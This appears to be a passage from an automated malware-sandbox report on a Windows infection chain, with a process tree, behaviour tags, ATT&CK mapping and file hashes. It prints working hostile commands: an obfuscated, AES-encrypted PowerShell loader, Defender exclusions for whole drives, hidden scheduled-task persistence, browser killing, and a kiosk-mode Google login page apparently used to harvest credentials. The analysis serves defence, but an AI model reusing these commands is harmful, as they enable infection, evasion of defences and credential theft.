6).Substring(2))));[System.Reflection.Assembly]::($dDiO[0])([byte[]]$hsQZC).($dDiO[10]).($dDiO[7])($null,$null);[System.Reflection.Assembly]::($dDiO[0])([byte[]]$kvBry).($dDiO[10]).($dDiO[7])($null,$null); "8⤵
- System Location Discovery: System Language Discovery
PID:1796
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe8⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:960 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:1856
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:3284
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network25450Man')9⤵
- System Location Discovery: System Language Discovery
PID:1252
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 25450' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network25450Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:4496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10002870121\lowsigmbye.cmd" "9⤵
- System Location Discovery: System Language Discovery
PID:4764 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\10002870121\lowsigmbye.cmd';$Zuin='LohLgJadhLgJ'.Replace('hLgJ', ''),'SpUdGHlitUdGH'.Replace('UdGH', ''),'CkzbKhankzbKgekzbKExkzbKtenkzbKskzbKikzbKokzbKnkzbK'.Replace('kzbK', ''),'TraXqevnsXqevforXqevmXqevFXqevinXqevalBXqevloXqevckXqev'.Replace('Xqev', ''),'CreIZJaatIZJaeIZJaDeIZJacIZJarIZJaypIZJatoIZJarIZJa'.Replace('IZJa', ''),'FrlsceomlsceBlscealsceslscee6lsce4Slscetrlsceinlsceglsce'.Replace('lsce', ''),'EnPCOltrPCOlyPoPCOlinPCOltPCOl'.Replace('PCOl', ''),'ElluGUemeluGUnluGUtluGUAtluGU'.Replace('luGU', ''),'CowSLIpyTwSLIowSLI'.Replace('wSLI', ''),'DQNkhecQNkhompQNkhrQNkheQNkhssQNkh'.Replace('QNkh', ''),'ReBEWfaBEWfdBEWfLBEWfineBEWfsBEWf'.Replace('BEWf', ''),'GetQshGCQshGurQshGreQshGnQshGtQshGPrQshGoQshGcQshGessQshG'.Replace('QshG', ''),'MahQKVinhQKVMhQKVohQKVduhQKVlehQKV'.Replace('hQKV', ''),'Invdqdfokdqdfedqdf'.Replace('dqdf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($Zuin[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function zvObs($JvbIA){$BTsJb=[System.Security.Cryptography.Aes]::Create();$BTsJb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$BTsJb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$BTsJb.Key=[System.Convert]::($Zuin[5])('KwI+m+CS1RDGlA9XTP7AS8wYXfFUGAPj9L5At8f7F1s=');$BTsJb.IV=[System.Convert]::($Zuin[5])('l/MlylluBYy9Hd3APLUJJw==');$WXMvq=$BTsJb.($Zuin[4])();$uocwr=$WXMvq.($Zuin[3])($JvbIA,0,$JvbIA.Length);$WXMvq.Dispose();$BTsJb.Dispose();$uocwr;}function YULgT($JvbIA){$JsFWY=New-Object System.IO.MemoryStream(,$JvbIA);$KRoOX=New-Object System.IO.MemoryStream;$WGloZ=New-Object System.IO.Compression.GZipStream($JsFWY,[IO.Compression.CompressionMode]::($Zuin[9]));$WGloZ.($Zuin[8])($KRoOX);$WGloZ.Dispose();$JsFWY.Dispose();$KRoOX.Dispose();$KRoOX.ToArray();}$WMVlw=[System.IO.File]::($Zuin[10])([Console]::Title);$wetuz=YULgT (zvObs ([Convert]::($Zuin[5])([System.Linq.Enumerable]::($Zuin[7])($WMVlw, 5).Substring(2))));$oCIEk=YULgT (zvObs ([Convert]::($Zuin[5])([System.Linq.Enumerable]::($Zuin[7])($WMVlw, 6).Substring(2))));[System.Reflection.Assembly]::($Zuin[0])([byte[]]$oCIEk).($Zuin[6]).($Zuin[13])($null,$null);[System.Reflection.Assembly]::($Zuin[0])([byte[]]$wetuz).($Zuin[6]).($Zuin[13])($null,$null); "10⤵
- System Location Discovery: System Language Discovery
PID:4376
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10⤵
- System Location Discovery: System Language Discovery
PID:2908 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden11⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:1876
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe"C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:732 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 732 -s 5685⤵
- Program crash
PID:3596
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011459001\abc488b187.exe"C:\Users\Admin\AppData\Local\Temp\1011459001\abc488b187.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3588 -
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:2128
-
-
C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1552 -
C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4836 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 12528⤵
- Program crash
PID:1124
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1002824001\ed32995a29.exe"C:\Users\Admin\AppData\Local\Temp\1002824001\ed32995a29.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3196 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 14847⤵
- Program crash
PID:4048
-
-
-
C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4984 -
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"7⤵
- System Location Discovery: System Language Discovery
PID:1668
-
-
-
C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3488
-
-
C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:2160 -
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4480 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\10009630142\Async.ps1"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5976
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main8⤵
- Blocklisted process makes network request
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4568
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1005061001\nSoft.exe"C:\Users\Admin\AppData\Local\Temp\1005061001\nSoft.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2276
-
-
C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe"C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5912 -
C:\Users\Admin\AppData\Local\Temp\is-L5E1D.tmp\newwork.tmp"C:\Users\Admin\AppData\Local\Temp\is-L5E1D.tmp\newwork.tmp" /SL5="$150220,3498837,54272,C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:5892
-
-
-
C:\Users\Admin\AppData\Local\Temp\1005150001\b22d8aa3a4.exe"C:\Users\Admin\AppData\Local\Temp\1005150001\b22d8aa3a4.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3444
-
-
C:\Users\Admin\AppData\Local\Temp\1005151001\851e234eee.exe"C:\Users\Admin\AppData\Local\Temp\1005151001\851e234eee.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2588 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 15287⤵
- Program crash
PID:5236
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 15687⤵
- Program crash
PID:1152
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011573001\c2d4ca6289.exe"C:\Users\Admin\AppData\Local\Temp\1011573001\c2d4ca6289.exe"4⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3540
-
-
C:\Users\Admin\AppData\Local\Temp\1011574001\e3c6c90ef9.exe"C:\Users\Admin\AppData\Local\Temp\1011574001\e3c6c90ef9.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:956
-
-
C:\Users\Admin\AppData\Local\Temp\1011575001\32810b99b0.exe"C:\Users\Admin\AppData\Local\Temp\1011575001\32810b99b0.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3772
-
-
C:\Users\Admin\AppData\Local\Temp\1011576001\33c3247dda.exe"C:\Users\Admin\AppData\Local\Temp\1011576001\33c3247dda.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1360 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2584
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4224
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3536
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1420
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T5⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3340
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking5⤵PID:1260
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking6⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4224 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2032 -parentBuildID 20240401114208 -prefsHandle 1948 -prefMapHandle 1940 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {28e443ce-b009-4d68-a5aa-d469a3902c1a} 4224 "\\.\pipe\gecko-crash-server-pipe.4224" gpu7⤵PID:3048
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2388 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {db30ccbb-8111-4c01-82dc-ac13c14e20b5} 4224 "\\.\pipe\gecko-crash-server-pipe.4224" socket7⤵PID:220
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3168 -childID 1 -isForBrowser -prefsHandle 3132 -prefMapHandle 3124 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c07b344-d958-4ca1-9de2-2ab5c32646de} 4224 "\\.\pipe\gecko-crash-server-pipe.4224" tab7⤵PID:1608
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4016 -childID 2 -isForBrowser -prefsHandle 3428 -prefMapHandle 3420 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6f0c6158-5b24-4103-bc99-c800ce4d22ca} 4224 "\\.\pipe\gecko-crash-server-pipe.4224" tab7⤵PID:5328
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4584 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4592 -prefMapHandle 4564 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {07c39ea7-d3b3-4de8-ac56-3bd9d97fe80a} 4224 "\\.\pipe\gecko-crash-server-pipe.4224" utility7⤵
- Checks processor information in registry
PID:6132
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5512 -childID 3 -isForBrowser -prefsHandle 2828 -prefMapHandle 4852 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c2eb2d1-2b81-46a3-af64-ffc3f35f2373} 4224 "\\.\pipe\gecko-crash-server-pipe.4224" tab7⤵PID:4560
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5648 -childID 4 -isForBrowser -prefsHandle 5656 -prefMapHandle 5660 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8588b824-b179-4a07-bb51-3056f6ac5783} 4224 "\\.\pipe\gecko-crash-server-pipe.4224" tab7⤵PID:1092
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5780 -childID 5 -isForBrowser -prefsHandle 5788 -prefMapHandle 5792 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8a2f5abe-98a9-4987-baf3-d0c8a98e09bc} 4224 "\\.\pipe\gecko-crash-server-pipe.4224" tab7⤵PID:5364
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1011577001\8b4b459c8c.exe"C:\Users\Admin\AppData\Local\Temp\1011577001\8b4b459c8c.exe"4⤵
- Modifies Windows Defender Real-time Protection settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:1504
-
-
C:\Users\Admin\AppData\Local\Temp\1011578001\fd3ff1536f.exe"C:\Users\Admin\AppData\Local\Temp\1011578001\fd3ff1536f.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5856
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2204
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4016
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4640
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4996
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:1680
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:4176
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 732 -ip 7322⤵PID:2560
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3196 -ip 31962⤵PID:5112
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4836 -ip 48362⤵PID:4568
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 2588 -ip 25882⤵PID:5324
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2588 -ip 25882⤵PID:5980
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
2Disable or Modify Tools
2Modify Registry
3Virtualization/Sandbox Evasion
3Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
4Credentials In Files
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
2.0MB
MD51cc453cdf74f31e4d913ff9c10acdde2
SHA16e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571
-
Filesize
7KB
MD5470f482f31bac1893a516fadf7abe8fa
SHA18de8e5474c5d0f638ce56e0db758b8bec675f762
SHA25618423e8a58d1da2bb3cadb13e9bba8f03ce98f4103b1ead4e3f0845d1bba514c
SHA512058675354c3e9ea2646a40074a612633e9c1225b8e6a8ee226561942aec99cf2382e38bed220e7e648fdf17ddd4410c3330a853aab04a26b691129e76ae84e3a
-
Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
Filesize
1KB
MD567e486b2f148a3fca863728242b6273e
SHA1452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize192B
MD59badbb9ddae8ab3e1821ba4adae68e35
SHA1576054031827309f53c4036b439e56f4f17fa341
SHA256676e199438bf17812c8f485a03606fa0a05939010e585d386e99215c362e1da4
SHA5129da22a744fa2c7021bf7fa2910e423a91cfa5b437f30161f1f7d407c0f73093d1923eda9ce961d19a7dc42b161d8c12990ce186a1c7180d6d8e8c1db9300c459
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD56e1bee954f9e4dbf3fb0a2939eb41213
SHA14a69964ce4170665f6c895dd4be62e6eee2217b5
SHA256da60c015b98d5a833dc181179af462190dfd815e3ce3d51addc89317ce49fa10
SHA5129a229fbdc0a48122842f1b8466a1149b33818a0d9b2a3bf7176db242e89f473ad0036be8d471fed1c7aedbf7a5f093b2b5281c6615ac9461ca7fac99decdf059
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD5e51f0796da1ef2e7ddc5771c4650f90f
SHA199f02a24979de175fd1e6bc550b94297968fa55a
SHA2569dd9dd88c145dbc889d28ced33858277ed7310a4edfc889940c50bd02150f6ab
SHA51266143a8f4bde0ba56bfa428cfac5dad963eb6b9fc8902704f8518bdfc370b6a86a9144ae7775a8876f1a8b58e996dbfa703f486c2e54c8ee3cbf4d3de264775b
-
Filesize
1KB
MD5938ffc2cba917b243d86b2cf76dcefb4
SHA1234b53d91d075f16cc63c731eefdae278e2faad3
SHA2565c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca
SHA512e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314
-
Filesize
20KB
MD50dedf778a76e3b84a75e8e5cfe203112
SHA158622fdddcaa23115ec87b4f0c80ccdd245b46b1
SHA256436edc727cfa3d031d3ed17b10eee01af9bc82eee442ae4e687300c1f29da776
SHA512f1631ed81cd7e094d5e857e1feca80230fd32c2f345ed075e2a2139bba4241a50e4e3e6cb900aaebfef9c355d5c434fd0b61e176b3c202558f829957df354b76
-
Filesize
1KB
MD52a75c2057536d71d287d7cefff04eec3
SHA1c61131dee25db97244118daaf982c0bd1389b8b4
SHA25693cf99b87df289b80cc8be11623fbb0b09812f2dcee9986e76cedb188ca942a0
SHA5121d8877aeade86757fb7d37b54abf27e8d6579a7a51bcbba549bcfd0c66a2b4383ab7f34eb4621c031262df4e5266332e1427f64af268922e24c24ed9ca94f150
-
Filesize
18KB
MD5bead4b03cd596ef8a1337b83250ca3e7
SHA112efd21a49b3dc717e8432acebd34187d0be4a57
SHA256c1c9ca4e99519c99a4540521135aebf398c273dd87284b834588e236b3636de1
SHA512ab073390a4554e2d7c67fd09780bd48fa0bf98e70ccc6629a711d22c6437d5bed661508a33153dbbc77a4e27ce86fbbe3ae7d110c6803b85374e357710139bdc
-
Filesize
20KB
MD5d374493dc9f180aa95b6087f9b281879
SHA12d2585e82b2ae34746713a4dc6db38634364d72a
SHA2561f03b56bb8360bd7979cef56a10655407006645d9ff759bb49b3c46712511443
SHA512826c88d07966676d6d11bfa7827669e02ab76e9de1b097f8e0c268fbd288b1d93f4721c75c4ab5ab338c14feb3f8ebe26fabece7a35af1acd84bdd3dfb94d59f
-
Filesize
21KB
MD5498fd179a6e1593b5e23f29a911128c9
SHA18292dbd989ba995276d1b84efedb66e974637789
SHA256329fd4332d9f641f1285450b0e374723e8a9f79dd4628e4c24ce89f383d9eb15
